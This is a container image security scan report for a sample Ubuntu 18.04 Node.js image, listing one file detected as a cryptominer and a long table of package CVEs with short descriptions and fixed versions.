samples/82zge/zagit

Region: eastus
Scan Summary
Critical vulnerabilities
2
Malicious files
1
Last scan

1 year, 8 months ago
Type of scan
Prevasio CSPM
Scan duration
2 minutes and 53 seconds
Image Details
Image URI
prevasio.azurecr.io/samples/82zge/zagit
Image tags
tag1
Digest
sha256:2821e49e2914a3c6170e4b6fe23e00323d1c2af19d18cd150dc9dc5fef798fc4
Created

5 years ago
Compressed size
204.72 MB
Uncompressed size
474.68 MB
OS/architecture
linux/amd64
OS distribution
ubuntu 18.04
Working directory
deadhash
ENTRYPOINT
CMD
/bin/sh-cnpm start
User
Ports
Volumes
Environment variables
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Filename File Size SHA 256 Threat Name Report
/deadhash/F7kqTuSTqEwrM0ci 946.95 kB 8e617d8502045b98ca796314cec0675f4fa451a6887b0fa9f655d18d622f1d4d Multios.Coinminer.Miner-6781728-2 VirusTotal
Overview
Critical
2
High
70
Medium
862
Low
668
Informational
0
Vulnerabilities (1,000)
Severity Name Package VersionFixed inDescription Package:version
Critical CVE-2021-42740 shell-quote 1.6.11.7.3The shell-quote package before 1.7.3 for Node.js allows command inject ... shell-quote:1.6.1
Critical CVE-2021-31597 xmlhttprequest-ssl 1.5.31.6.1xmlhttprequest-ssl: SSL certificate validation disabled by default xmlhttprequest-ssl:1.5.3
High CVE-2018-0501 apt 1.6.11.6.3ubuntu0.1The mirror:// method implementation in Advanced Package Tool (APT) 1.6 ... apt:1.6.1
High CVE-2019-3462 apt 1.6.11.6.6ubuntu0.1Incorrect sanitation of the 302 redirect field in HTTP transport metho ... apt:1.6.1
High CVE-2018-0501 libapt-pkg5.0 1.6.11.6.3ubuntu0.1The mirror:// method implementation in Advanced Package Tool (APT) 1.6 ... libapt-pkg5.0:1.6.1
High CVE-2019-3462 libapt-pkg5.0 1.6.11.6.6ubuntu0.1Incorrect sanitation of the 302 redirect field in HTTP transport metho ... libapt-pkg5.0:1.6.1
High CVE-2022-25235 libexpat1 2.2.5-32.2.5-3ubuntu0.4expat: Malformed 2- and 3-byte UTF-8 sequences can lead to arbitrary code execution libexpat1:2.2.5-3
High CVE-2022-25236 libexpat1 2.2.5-32.2.5-3ubuntu0.4expat: Namespace-separator characters in "xmlns[:prefix]" attribute values can lead to arbitrary code execution libexpat1:2.2.5-3
High CVE-2022-24407 libsasl2-2 2.1.27~101-g0780600+dfsg-3ubuntu22.1.27~101-g0780600+dfsg-3ubuntu2.4cyrus-sasl: failure to properly escape SQL input allows an attacker to execute arbitrary SQL commands libsasl2-2:2.1.27~101-g0780600+dfsg-3ubuntu2
High CVE-2022-24407 libsasl2-modules 2.1.27~101-g0780600+dfsg-3ubuntu22.1.27~101-g0780600+dfsg-3ubuntu2.4cyrus-sasl: failure to properly escape SQL input allows an attacker to execute arbitrary SQL commands libsasl2-modules:2.1.27~101-g0780600+dfsg-3ubuntu2
High CVE-2022-24407 libsasl2-modules-db 2.1.27~101-g0780600+dfsg-3ubuntu22.1.27~101-g0780600+dfsg-3ubuntu2.4cyrus-sasl: failure to properly escape SQL input allows an attacker to execute arbitrary SQL commands libsasl2-modules-db:2.1.27~101-g0780600+dfsg-3ubuntu2
High CVE-2020-1971 libssl1.0.0 1.0.2n-1ubuntu5.11.0.2n-1ubuntu5.5openssl: EDIPARTYNAME NULL pointer de-reference libssl1.0.0:1.0.2n-1ubuntu5.1
High CVE-2022-0778 libssl1.0.0 1.0.2n-1ubuntu5.11.0.2n-1ubuntu5.8openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates libssl1.0.0:1.0.2n-1ubuntu5.1
High CVE-2020-1971 libssl1.1 1.1.0g-2ubuntu4.11.1.1-1ubuntu2.1~18.04.7openssl: EDIPARTYNAME NULL pointer de-reference libssl1.1:1.1.0g-2ubuntu4.1
High CVE-2021-3449 libssl1.1 1.1.0g-2ubuntu4.11.1.1-1ubuntu2.1~18.04.9openssl: NULL pointer dereference in signature_algorithms processing libssl1.1:1.1.0g-2ubuntu4.1
High CVE-2021-3711 libssl1.1 1.1.0g-2ubuntu4.11.1.1-1ubuntu2.1~18.04.13openssl: SM2 Decryption Buffer Overflow libssl1.1:1.1.0g-2ubuntu4.1
High CVE-2022-0778 libssl1.1 1.1.0g-2ubuntu4.11.1.1-1ubuntu2.1~18.04.15openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates libssl1.1:1.1.0g-2ubuntu4.1
High CVE-2018-16864 libsystemd0 237-3ubuntu10237-3ubuntu10.11systemd: stack overflow when calling syslog from a command with long cmdline libsystemd0:237-3ubuntu10
High CVE-2018-16865 libsystemd0 237-3ubuntu10237-3ubuntu10.11systemd: stack overflow when receiving many journald entries libsystemd0:237-3ubuntu10
High CVE-2021-33910 libsystemd0 237-3ubuntu10237-3ubuntu10.49systemd: uncontrolled allocation on the stack in function unit_name_path_escape leads to crash libsystemd0:237-3ubuntu10
High CVE-2018-16864 libudev1 237-3ubuntu10237-3ubuntu10.11systemd: stack overflow when calling syslog from a command with long cmdline libudev1:237-3ubuntu10
High CVE-2018-16865 libudev1 237-3ubuntu10237-3ubuntu10.11systemd: stack overflow when receiving many journald entries libudev1:237-3ubuntu10
High CVE-2021-33910 libudev1 237-3ubuntu10237-3ubuntu10.49systemd: uncontrolled allocation on the stack in function unit_name_path_escape leads to crash libudev1:237-3ubuntu10
High CVE-2018-12126 linux-libc-dev 4.15.0-24.264.15.0-50.54hardware: Microarchitectural Store Buffer Data Sampling (MSBDS) linux-libc-dev:4.15.0-24.26
High CVE-2018-12127 linux-libc-dev 4.15.0-24.264.15.0-50.54hardware: Micro-architectural Load Port Data Sampling - Information Leak (MLPDS) linux-libc-dev:4.15.0-24.26
High CVE-2018-12130 linux-libc-dev 4.15.0-24.264.15.0-50.54hardware: Microarchitectural Fill Buffer Data Sampling (MFBDS) linux-libc-dev:4.15.0-24.26
High CVE-2018-12207 linux-libc-dev 4.15.0-24.264.15.0-69.78hw: Machine Check Error on Page Size Change (IFU) linux-libc-dev:4.15.0-24.26
High CVE-2018-15471 linux-libc-dev 4.15.0-24.264.15.0-39.42kernel: net: xen: Linux netback driver OOB access in hash handling (XSA-270) linux-libc-dev:4.15.0-24.26
High CVE-2018-15572 linux-libc-dev 4.15.0-24.264.15.0-36.39Kernel: hw: cpu: userspace-userspace spectreRSB attack linux-libc-dev:4.15.0-24.26
High CVE-2018-15594 linux-libc-dev 4.15.0-24.264.15.0-36.39kernel: Mishandling of indirect calls weakens Spectre mitigation for paravirtual guests linux-libc-dev:4.15.0-24.26
High CVE-2018-17182 linux-libc-dev 4.15.0-24.264.15.0-36.39kernel: Use-after-free in the vmacache_flush_all function resulting in a possible privilege escalation linux-libc-dev:4.15.0-24.26
High CVE-2018-3620 linux-libc-dev 4.15.0-24.264.15.0-32.35CVE-2018-3646 Kernel: hw: cpu: L1 terminal fault (L1TF) linux-libc-dev:4.15.0-24.26
High CVE-2018-3646 linux-libc-dev 4.15.0-24.264.15.0-32.35CVE-2018-3620 CVE-2018-3646 Kernel: hw: cpu: L1 terminal fault (L1TF) linux-libc-dev:4.15.0-24.26
High CVE-2018-5390 linux-libc-dev 4.15.0-24.264.15.0-30.32kernel: TCP segments with random offsets allow a remote denial of service (SegmentSmack) linux-libc-dev:4.15.0-24.26
High CVE-2018-5391 linux-libc-dev 4.15.0-24.264.15.0-32.35kernel: IP fragments with random offsets allow a remote denial of service (FragmentSmack) linux-libc-dev:4.15.0-24.26
High CVE-2019-0155 linux-libc-dev 4.15.0-24.264.15.0-70.79hw: Intel GPU blitter manipulation can allow for arbitrary kernel memory write linux-libc-dev:4.15.0-24.26
High CVE-2019-11135 linux-libc-dev 4.15.0-24.264.15.0-69.78hw: TSX Transaction Asynchronous Abort (TAA) linux-libc-dev:4.15.0-24.26
High CVE-2019-11477 linux-libc-dev 4.15.0-24.264.15.0-52.56Kernel: tcp: integer overflow while processing SACK blocks allows remote denial of service linux-libc-dev:4.15.0-24.26
High CVE-2019-11478 linux-libc-dev 4.15.0-24.264.15.0-52.56Kernel: tcp: excessive resource consumption while processing SACK blocks allows remote denial of service linux-libc-dev:4.15.0-24.26
High CVE-2019-14835 linux-libc-dev 4.15.0-24.264.15.0-64.73kernel: vhost-net: guest to host kernel escape during migration linux-libc-dev:4.15.0-24.26
High CVE-2020-11884 linux-libc-dev 4.15.0-24.264.15.0-99.100Kernel: s390: page table upgrade in secondary address mode may lead to privilege escalation linux-libc-dev:4.15.0-24.26
High CVE-2020-12351 linux-libc-dev 4.15.0-24.264.15.0-122.124kernel: net: bluetooth: type confusion while processing AMP packets linux-libc-dev:4.15.0-24.26
High CVE-2020-12654 linux-libc-dev 4.15.0-24.264.15.0-96.97kernel: heap-based buffer overflow in mwifiex_ret_wmm_get_status function in drivers/net/wireless/marvell/mwifiex/wmm.c linux-libc-dev:4.15.0-24.26
High CVE-2020-14386 linux-libc-dev 4.15.0-24.264.15.0-117.118kernel: memory corruption in net/packet/af_packet.c leads to elevation of privilege linux-libc-dev:4.15.0-24.26
High CVE-2020-16119 linux-libc-dev 4.15.0-24.264.15.0-121.123kernel: DCCP CCID structure use-after-free may lead to DoS or code execution linux-libc-dev:4.15.0-24.26
High CVE-2020-27170 linux-libc-dev 4.15.0-24.264.15.0-140.144kernel: Speculation on pointer arithmetic against bpf_context pointer linux-libc-dev:4.15.0-24.26
High CVE-2020-27171 linux-libc-dev 4.15.0-24.264.15.0-140.144kernel: Integer underflow when restricting speculative pointer arithmetic linux-libc-dev:4.15.0-24.26
High CVE-2020-28374 linux-libc-dev 4.15.0-24.264.15.0-132.136kernel: SCSI target (LIO) write to any block on ILO backstore linux-libc-dev:4.15.0-24.26
High CVE-2020-29661 linux-libc-dev 4.15.0-24.264.15.0-136.140kernel: locking issue in drivers/tty/tty_jobctrl.c can lead to an use-after-free linux-libc-dev:4.15.0-24.26
High CVE-2021-22555 linux-libc-dev 4.15.0-24.264.15.0-144.148kernel: out-of-bounds write in xt_compat_target_from_user() in net/netfilter/x_tables.c linux-libc-dev:4.15.0-24.26
High CVE-2021-27365 linux-libc-dev 4.15.0-24.264.15.0-139.143kernel: heap buffer overflow in the iSCSI subsystem linux-libc-dev:4.15.0-24.26
High CVE-2021-29154 linux-libc-dev 4.15.0-24.264.15.0-142.146kernel: Local privilege escalation due to incorrect BPF JIT branch displacement computation linux-libc-dev:4.15.0-24.26
High CVE-2021-33909 linux-libc-dev 4.15.0-24.264.15.0-151.157kernel: size_t-to-int conversion vulnerability in the filesystem layer linux-libc-dev:4.15.0-24.26
High CVE-2021-3493 linux-libc-dev 4.15.0-24.264.15.0-142.146kernel: overlayfs file system caps privilege escalation linux-libc-dev:4.15.0-24.26
High CVE-2021-3600 linux-libc-dev 4.15.0-24.264.15.0-147.151kernel: eBPF 32-bit source register truncation on div/mod linux-libc-dev:4.15.0-24.26
High CVE-2021-3609 linux-libc-dev 4.15.0-24.264.15.0-147.151kernel: race condition in net/can/bcm.c leads to local privilege escalation linux-libc-dev:4.15.0-24.26
High CVE-2021-3653 linux-libc-dev 4.15.0-24.264.15.0-156.163kernel: SVM nested virtualization issue in KVM (AVIC support) linux-libc-dev:4.15.0-24.26
High CVE-2021-3656 linux-libc-dev 4.15.0-24.264.15.0-156.163kernel: SVM nested virtualization issue in KVM (VMLOAD/VMSAVE) linux-libc-dev:4.15.0-24.26
High CVE-2021-3715 linux-libc-dev 4.15.0-24.264.15.0-99.100kernel: use-after-free in route4_change() in net/sched/cls_route.c linux-libc-dev:4.15.0-24.26
High CVE-2021-4002 linux-libc-dev 4.15.0-24.264.15.0-166.174kernel: possible leak or coruption of data residing on hugetlbfs linux-libc-dev:4.15.0-24.26
High CVE-2022-0001 linux-libc-dev 4.15.0-24.264.15.0-171.180hw: cpu: intel: Branch History Injection (BHI) linux-libc-dev:4.15.0-24.26
High CVE-2022-0002 linux-libc-dev 4.15.0-24.264.15.0-171.180hw: cpu: intel: Intra-Mode BTI linux-libc-dev:4.15.0-24.26
High CVE-2022-0492 linux-libc-dev 4.15.0-24.264.15.0-173.182kernel: cgroups v1 release_agent feature may allow privilege escalation linux-libc-dev:4.15.0-24.26
High CVE-2022-21499 linux-libc-dev 4.15.0-24.264.15.0-184.194kernel: possible to use the debugger to write zero into a location of choice linux-libc-dev:4.15.0-24.26
High CVE-2022-29581 linux-libc-dev 4.15.0-24.264.15.0-180.189kernel: Improper Update of Reference Count vulnerability in net/sched linux-libc-dev:4.15.0-24.26
High CVE-2020-1971 openssl 1.1.0g-2ubuntu4.11.1.1-1ubuntu2.1~18.04.7openssl: EDIPARTYNAME NULL pointer de-reference openssl:1.1.0g-2ubuntu4.1
High CVE-2021-3449 openssl 1.1.0g-2ubuntu4.11.1.1-1ubuntu2.1~18.04.9openssl: NULL pointer dereference in signature_algorithms processing openssl:1.1.0g-2ubuntu4.1
High CVE-2021-3711 openssl 1.1.0g-2ubuntu4.11.1.1-1ubuntu2.1~18.04.13openssl: SM2 Decryption Buffer Overflow openssl:1.1.0g-2ubuntu4.1
High CVE-2022-0778 openssl 1.1.0g-2ubuntu4.11.1.1-1ubuntu2.1~18.04.15openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates openssl:1.1.0g-2ubuntu4.1
High CVE-2020-36048 engine.io 1.8.53.6.0yarnpkg-socket.io/engine.io: allows attackers to cause a denial of service (resource consumption) via a POST request to the long polling transport engine.io:1.8.5
High CVE-2020-36049 socket.io-parser 2.3.13.4.1, 3.3.2yarnpkg-socket.io-parser: a denial of service (memory consumption) via a large packet because a concatenation approach is used socket.io-parser:2.3.1
High CVE-2020-28502 xmlhttprequest-ssl 1.5.31.6.2nodejs-xmlhttprequest: Code injection through user input to xhr.send xmlhttprequest-ssl:1.5.3
Medium CVE-2020-27350 apt 1.6.11.6.12ubuntu0.2apt: integer overflows and underflows while parsing .deb packages apt:1.6.1
Medium CVE-2020-3810 apt 1.6.11.6.12ubuntu0.1Missing input validation in the ar/tar implementations of APT before v ... apt:1.6.1
Medium CVE-2019-14250 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: integer overflow in simple-object-elf.c leads to a heap-based buffer overflow binutils:2.30-20ubuntu2~18.04
Medium CVE-2019-14444 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: integer overflow in function apply_relocation in readelf.c binutils:2.30-20ubuntu2~18.04
Medium CVE-2019-17451 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: integer overflow leading to a SEGV in _bfd_dwarf2_find_nearest_line in dwarf2.c binutils:2.30-20ubuntu2~18.04
Medium CVE-2019-14250 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: integer overflow in simple-object-elf.c leads to a heap-based buffer overflow binutils-common:2.30-20ubuntu2~18.04
Medium CVE-2019-14444 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: integer overflow in function apply_relocation in readelf.c binutils-common:2.30-20ubuntu2~18.04
Medium CVE-2019-17451 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: integer overflow leading to a SEGV in _bfd_dwarf2_find_nearest_line in dwarf2.c binutils-common:2.30-20ubuntu2~18.04
Medium CVE-2019-14250 binutils-x86-64-linux-gnu 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: integer overflow in simple-object-elf.c leads to a heap-based buffer overflow binutils-x86-64-linux-gnu:2.30-20ubuntu2~18.04
Medium CVE-2019-14444 binutils-x86-64-linux-gnu 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: integer overflow in function apply_relocation in readelf.c binutils-x86-64-linux-gnu:2.30-20ubuntu2~18.04
Medium CVE-2019-17451 binutils-x86-64-linux-gnu 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: integer overflow leading to a SEGV in _bfd_dwarf2_find_nearest_line in dwarf2.c binutils-x86-64-linux-gnu:2.30-20ubuntu2~18.04
Medium CVE-2019-12900 bzip2 1.0.6-8.11.0.6-8.1ubuntu0.2bzip2: out-of-bounds write in function BZ2_decompress bzip2:1.0.6-8.1
Medium CVE-2018-1000858 dirmngr 2.2.4-1ubuntu1.12.2.4-1ubuntu1.2gnupg2: Cross site request forgery in dirmngr resulting in an information disclosure or denial of service dirmngr:2.2.4-1ubuntu1.1
Medium CVE-2022-34903 dirmngr 2.2.4-1ubuntu1.12.2.4-1ubuntu1.6gpg: Signature spoofing via status line injection dirmngr:2.2.4-1ubuntu1.1
Medium CVE-2022-1664 dpkg 1.19.0.5ubuntu21.19.0.5ubuntu2.4Dpkg::Source::Archive in dpkg, the Debian package management system, b ... dpkg:1.19.0.5ubuntu2
Medium CVE-2022-1664 dpkg-dev 1.19.0.5ubuntu21.19.0.5ubuntu2.4Dpkg::Source::Archive in dpkg, the Debian package management system, b ... dpkg-dev:1.19.0.5ubuntu2
Medium CVE-2019-5094 e2fsprogs 1.44.1-11.44.1-1ubuntu1.2e2fsprogs: Crafted ext4 partition leads to out-of-bounds write e2fsprogs:1.44.1-1
Medium CVE-2019-5188 e2fsprogs 1.44.1-11.44.1-1ubuntu1.3e2fsprogs: Out-of-bounds write in e2fsck/rehash.c e2fsprogs:1.44.1-1
Medium CVE-2022-1304 e2fsprogs 1.44.1-11.44.1-1ubuntu1.4e2fsprogs: out-of-bounds read/write via crafted filesystem e2fsprogs:1.44.1-1
Medium CVE-2019-18218 file 1:5.32-2ubuntu0.11:5.32-2ubuntu0.3file: heap-based buffer overflow in cdf_read_property_info in cdf.c file:1:5.32-2ubuntu0.1
Medium CVE-2019-8906 file 1:5.32-2ubuntu0.11:5.32-2ubuntu0.2file: out-of-bounds read in do_core_note in readelf.c file:1:5.32-2ubuntu0.1
Medium CVE-2019-8907 file 1:5.32-2ubuntu0.11:5.32-2ubuntu0.2file: do_core_note in readelf.c allows remote attackers to cause a denial of service file:1:5.32-2ubuntu0.1
Medium CVE-2018-17456 git-man 1:2.17.1-1ubuntu0.11:2.17.1-1ubuntu0.3git: arbitrary code execution via .gitmodules git-man:1:2.17.1-1ubuntu0.1
Medium CVE-2018-19486 git-man 1:2.17.1-1ubuntu0.11:2.17.1-1ubuntu0.4git: Improper handling of PATH allows for commands to be executed from the current directory git-man:1:2.17.1-1ubuntu0.1
Medium CVE-2019-1348 git-man 1:2.17.1-1ubuntu0.11:2.17.1-1ubuntu0.5git: Arbitrary path overwriting via export-marks in-stream command feature git-man:1:2.17.1-1ubuntu0.1
Medium CVE-2019-1350 git-man 1:2.17.1-1ubuntu0.11:2.17.1-1ubuntu0.5git: Incorrect quoting of command-line arguments allowed remote code execution during a recursive clone git-man:1:2.17.1-1ubuntu0.1
Medium CVE-2019-1351 git-man 1:2.17.1-1ubuntu0.11:2.17.1-1ubuntu0.5git: Git mistakes some paths for relative paths allowing writing outside of the worktree while cloning git-man:1:2.17.1-1ubuntu0.1
Medium CVE-2019-1352 git-man 1:2.17.1-1ubuntu0.11:2.17.1-1ubuntu0.5git: Files inside the .git directory may be overwritten during cloning via NTFS Alternate Data Streams git-man:1:2.17.1-1ubuntu0.1
Medium CVE-2019-1353 git-man 1:2.17.1-1ubuntu0.11:2.17.1-1ubuntu0.5git: NTFS protections inactive when running Git in the Windows Subsystem for Linux git-man:1:2.17.1-1ubuntu0.1
Medium CVE-2020-11008 git-man 1:2.17.1-1ubuntu0.11:2.17.1-1ubuntu0.7git: Crafted URL containing new lines, empty host or lacks a scheme can cause credential leak git-man:1:2.17.1-1ubuntu0.1
Medium CVE-2020-5260 git-man 1:2.17.1-1ubuntu0.11:2.17.1-1ubuntu0.6git: Crafted URL containing new lines can cause credential leak git-man:1:2.17.1-1ubuntu0.1
Medium CVE-2021-21300 git-man 1:2.17.1-1ubuntu0.11:2.17.1-1ubuntu0.8git: remote code execution during clone operation on case-insensitive filesystems git-man:1:2.17.1-1ubuntu0.1
Medium CVE-2021-40330 git-man 1:2.17.1-1ubuntu0.11:2.17.1-1ubuntu0.9git: unexpected cross-protocol requests via a repository path containing a newline character git-man:1:2.17.1-1ubuntu0.1
Medium CVE-2022-24765 git-man 1:2.17.1-1ubuntu0.11:2.17.1-1ubuntu0.11git: On multi-user machines Git users might find themselves unexpectedly in a Git worktree git-man:1:2.17.1-1ubuntu0.1
Medium CVE-2022-29187 git-man 1:2.17.1-1ubuntu0.11:2.17.1-1ubuntu0.12git: Bypass of safe.directory protections git-man:1:2.17.1-1ubuntu0.1
Medium CVE-2018-1000858 gnupg 2.2.4-1ubuntu1.12.2.4-1ubuntu1.2gnupg2: Cross site request forgery in dirmngr resulting in an information disclosure or denial of service gnupg:2.2.4-1ubuntu1.1
Medium CVE-2022-34903 gnupg 2.2.4-1ubuntu1.12.2.4-1ubuntu1.6gpg: Signature spoofing via status line injection gnupg:2.2.4-1ubuntu1.1
Medium CVE-2018-1000858 gnupg-l10n 2.2.4-1ubuntu1.12.2.4-1ubuntu1.2gnupg2: Cross site request forgery in dirmngr resulting in an information disclosure or denial of service gnupg-l10n:2.2.4-1ubuntu1.1
Medium CVE-2022-34903 gnupg-l10n 2.2.4-1ubuntu1.12.2.4-1ubuntu1.6gpg: Signature spoofing via status line injection gnupg-l10n:2.2.4-1ubuntu1.1
Medium CVE-2018-1000858 gnupg-utils 2.2.4-1ubuntu1.12.2.4-1ubuntu1.2gnupg2: Cross site request forgery in dirmngr resulting in an information disclosure or denial of service gnupg-utils:2.2.4-1ubuntu1.1
Medium CVE-2022-34903 gnupg-utils 2.2.4-1ubuntu1.12.2.4-1ubuntu1.6gpg: Signature spoofing via status line injection gnupg-utils:2.2.4-1ubuntu1.1
Medium CVE-2018-1000858 gpg 2.2.4-1ubuntu1.12.2.4-1ubuntu1.2gnupg2: Cross site request forgery in dirmngr resulting in an information disclosure or denial of service gpg:2.2.4-1ubuntu1.1
Medium CVE-2022-34903 gpg 2.2.4-1ubuntu1.12.2.4-1ubuntu1.6gpg: Signature spoofing via status line injection gpg:2.2.4-1ubuntu1.1
Medium CVE-2018-1000858 gpg-agent 2.2.4-1ubuntu1.12.2.4-1ubuntu1.2gnupg2: Cross site request forgery in dirmngr resulting in an information disclosure or denial of service gpg-agent:2.2.4-1ubuntu1.1
Medium CVE-2022-34903 gpg-agent 2.2.4-1ubuntu1.12.2.4-1ubuntu1.6gpg: Signature spoofing via status line injection gpg-agent:2.2.4-1ubuntu1.1
Medium CVE-2018-1000858 gpg-wks-client 2.2.4-1ubuntu1.12.2.4-1ubuntu1.2gnupg2: Cross site request forgery in dirmngr resulting in an information disclosure or denial of service gpg-wks-client:2.2.4-1ubuntu1.1
Medium CVE-2022-34903 gpg-wks-client 2.2.4-1ubuntu1.12.2.4-1ubuntu1.6gpg: Signature spoofing via status line injection gpg-wks-client:2.2.4-1ubuntu1.1
Medium CVE-2018-1000858 gpg-wks-server 2.2.4-1ubuntu1.12.2.4-1ubuntu1.2gnupg2: Cross site request forgery in dirmngr resulting in an information disclosure or denial of service gpg-wks-server:2.2.4-1ubuntu1.1
Medium CVE-2022-34903 gpg-wks-server 2.2.4-1ubuntu1.12.2.4-1ubuntu1.6gpg: Signature spoofing via status line injection gpg-wks-server:2.2.4-1ubuntu1.1
Medium CVE-2018-1000858 gpgconf 2.2.4-1ubuntu1.12.2.4-1ubuntu1.2gnupg2: Cross site request forgery in dirmngr resulting in an information disclosure or denial of service gpgconf:2.2.4-1ubuntu1.1
Medium CVE-2022-34903 gpgconf 2.2.4-1ubuntu1.12.2.4-1ubuntu1.6gpg: Signature spoofing via status line injection gpgconf:2.2.4-1ubuntu1.1
Medium CVE-2018-1000858 gpgsm 2.2.4-1ubuntu1.12.2.4-1ubuntu1.2gnupg2: Cross site request forgery in dirmngr resulting in an information disclosure or denial of service gpgsm:2.2.4-1ubuntu1.1
Medium CVE-2022-34903 gpgsm 2.2.4-1ubuntu1.12.2.4-1ubuntu1.6gpg: Signature spoofing via status line injection gpgsm:2.2.4-1ubuntu1.1
Medium CVE-2018-1000858 gpgv 2.2.4-1ubuntu1.12.2.4-1ubuntu1.2gnupg2: Cross site request forgery in dirmngr resulting in an information disclosure or denial of service gpgv:2.2.4-1ubuntu1.1
Medium CVE-2022-34903 gpgv 2.2.4-1ubuntu1.12.2.4-1ubuntu1.6gpg: Signature spoofing via status line injection gpgv:2.2.4-1ubuntu1.1
Medium CVE-2022-1271 gzip 1.6-5ubuntu11.6-5ubuntu1.2gzip: arbitrary-file-write vulnerability gzip:1.6-5ubuntu1
Medium CVE-2020-28196 krb5-locales 1.16-2build11.16-2ubuntu0.2krb5: unbounded recursion via an ASN.1-encoded Kerberos message in lib/krb5/asn.1/asn1_encode.c may lead to DoS krb5-locales:1.16-2build1
Medium CVE-2020-27350 libapt-pkg5.0 1.6.11.6.12ubuntu0.2apt: integer overflows and underflows while parsing .deb packages libapt-pkg5.0:1.6.1
Medium CVE-2020-3810 libapt-pkg5.0 1.6.11.6.12ubuntu0.1Missing input validation in the ar/tar implementations of APT before v ... libapt-pkg5.0:1.6.1
Medium CVE-2018-1000877 libarchive13 3.2.2-3.13.2.2-3.1ubuntu0.2libarchive: Double free in RAR decoder resulting in a denial of service libarchive13:3.2.2-3.1
Medium CVE-2018-1000878 libarchive13 3.2.2-3.13.2.2-3.1ubuntu0.2libarchive: Use after free in RAR decoder resulting in a denial of service libarchive13:3.2.2-3.1
Medium CVE-2019-1000020 libarchive13 3.2.2-3.13.2.2-3.1ubuntu0.3libarchive: Infinite recursion in archive_read_support_format_iso9660.c resulting in denial of service libarchive13:3.2.2-3.1
Medium CVE-2019-18408 libarchive13 3.2.2-3.13.2.2-3.1ubuntu0.5libarchive: use-after-free in archive_read_format_rar_read_data when there is an error in the decompression of an archive entry libarchive13:3.2.2-3.1
Medium CVE-2019-14250 libbinutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: integer overflow in simple-object-elf.c leads to a heap-based buffer overflow libbinutils:2.30-20ubuntu2~18.04
Medium CVE-2019-14444 libbinutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: integer overflow in function apply_relocation in readelf.c libbinutils:2.30-20ubuntu2~18.04
Medium CVE-2019-17451 libbinutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: integer overflow leading to a SEGV in _bfd_dwarf2_find_nearest_line in dwarf2.c libbinutils:2.30-20ubuntu2~18.04
Medium CVE-2019-20367 libbsd0 0.8.7-10.8.7-1ubuntu0.1nlist.c in libbsd before 0.10.0 has an out-of-bounds read during a com ... libbsd0:0.8.7-1
Medium CVE-2019-12900 libbz2-1.0 1.0.6-8.11.0.6-8.1ubuntu0.2bzip2: out-of-bounds write in function BZ2_decompress libbz2-1.0:1.0.6-8.1
Medium CVE-2018-11236 libc-bin 2.27-3ubuntu12.27-3ubuntu1.2glibc: Integer overflow in stdlib/canonicalize.c on 32-bit architectures leading to stack-based buffer overflow libc-bin:2.27-3ubuntu1
Medium CVE-2018-11237 libc-bin 2.27-3ubuntu12.27-3ubuntu1.2glibc: Buffer overflow in __mempcpy_avx512_no_vzeroupper libc-bin:2.27-3ubuntu1
Medium CVE-2018-19591 libc-bin 2.27-3ubuntu12.27-3ubuntu1.2glibc: file descriptor leak in if_nametoindex() in sysdeps/unix/sysv/linux/if_index.c libc-bin:2.27-3ubuntu1
Medium CVE-2020-1751 libc-bin 2.27-3ubuntu12.27-3ubuntu1.2glibc: array overflow in backtrace functions for powerpc libc-bin:2.27-3ubuntu1
Medium CVE-2021-3999 libc-bin 2.27-3ubuntu12.27-3ubuntu1.5glibc: Off-by-one buffer overflow/underflow in getcwd() libc-bin:2.27-3ubuntu1
Medium CVE-2018-11236 libc-dev-bin 2.27-3ubuntu12.27-3ubuntu1.2glibc: Integer overflow in stdlib/canonicalize.c on 32-bit architectures leading to stack-based buffer overflow libc-dev-bin:2.27-3ubuntu1
Medium CVE-2018-11237 libc-dev-bin 2.27-3ubuntu12.27-3ubuntu1.2glibc: Buffer overflow in __mempcpy_avx512_no_vzeroupper libc-dev-bin:2.27-3ubuntu1
Medium CVE-2018-19591 libc-dev-bin 2.27-3ubuntu12.27-3ubuntu1.2glibc: file descriptor leak in if_nametoindex() in sysdeps/unix/sysv/linux/if_index.c libc-dev-bin:2.27-3ubuntu1
Medium CVE-2020-1751 libc-dev-bin 2.27-3ubuntu12.27-3ubuntu1.2glibc: array overflow in backtrace functions for powerpc libc-dev-bin:2.27-3ubuntu1
Medium CVE-2021-3999 libc-dev-bin 2.27-3ubuntu12.27-3ubuntu1.5glibc: Off-by-one buffer overflow/underflow in getcwd() libc-dev-bin:2.27-3ubuntu1
Medium CVE-2018-11236 libc6 2.27-3ubuntu12.27-3ubuntu1.2glibc: Integer overflow in stdlib/canonicalize.c on 32-bit architectures leading to stack-based buffer overflow libc6:2.27-3ubuntu1
Medium CVE-2018-11237 libc6 2.27-3ubuntu12.27-3ubuntu1.2glibc: Buffer overflow in __mempcpy_avx512_no_vzeroupper libc6:2.27-3ubuntu1
Medium CVE-2018-19591 libc6 2.27-3ubuntu12.27-3ubuntu1.2glibc: file descriptor leak in if_nametoindex() in sysdeps/unix/sysv/linux/if_index.c libc6:2.27-3ubuntu1
Medium CVE-2020-1751 libc6 2.27-3ubuntu12.27-3ubuntu1.2glibc: array overflow in backtrace functions for powerpc libc6:2.27-3ubuntu1
Medium CVE-2021-3999 libc6 2.27-3ubuntu12.27-3ubuntu1.5glibc: Off-by-one buffer overflow/underflow in getcwd() libc6:2.27-3ubuntu1
Medium CVE-2018-11236 libc6-dev 2.27-3ubuntu12.27-3ubuntu1.2glibc: Integer overflow in stdlib/canonicalize.c on 32-bit architectures leading to stack-based buffer overflow libc6-dev:2.27-3ubuntu1
